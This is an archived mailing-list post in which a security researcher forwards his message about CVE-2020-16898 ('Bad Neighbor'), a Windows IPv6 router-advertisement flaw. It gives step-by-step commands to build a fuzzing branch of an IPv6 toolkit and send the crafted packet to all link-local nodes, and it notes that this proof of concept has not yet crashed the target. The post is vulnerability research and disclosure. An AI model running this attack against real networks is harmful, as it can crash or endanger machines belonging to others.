[lacnog] Fwd: CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)
Fernando Gont
fgont en si6networks.com
Mie Oct 14 13:47:56 -03 2020
FYI
-------- Forwarded Message --------
Subject: CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)
Date: Wed, 14 Oct 2020 13:24:22 -0300
From: Fernando Gont <fgont en si6networks.com>
To: IPv6 Hackers Mailing List <ipv6hackers en lists.si6networks.com>
Folks,
You may be aware about CVE-2020-16898. If not, now you are :-) :
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/
I've produced PoC for the aforementioned vulnerability according to the
description on the McAfee site, but somehow I seem to fail to trigger
the "Blue Screen Of Death" when trying the attack against my local MS
Windows 10 installation.
FWIW, the packet I'm sending can be downloaded (pcap) here:
https://www.gont.com.ar/pcaps/bad-neighbor.pcap
The packet can be crafted with the ra6 tool of the SI6 toolkit present
in the "nd-opt-fuzzing" branch of the github repo
(https://github.com/fgont/ipv6toolkit). That is,
git clone https://github.com/fgont/ipv6toolkit.git
cd ipv6toolkit
git checkout nd-opt-fuzzing
sudo make install
And then run the ra6 tool as:
sudo ra6 -i INTERFACE --bad-neighbor -d ff02::1 -v -e
Note that this will target all nodes on the local-link for the INTERFACE
interface. You may set the "-d" option to a unicast address if you want
to target a single system.
I'll keep looking further into this issue and report back to the group
if I find anything.
If you do play with the tool and test the PoC, please do let me/us know.
Thanks!
Regards,
--
Fernando Gont
SI6 Networks
e-mail: fgont en si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
Más información sobre la lista de distribución LACNOG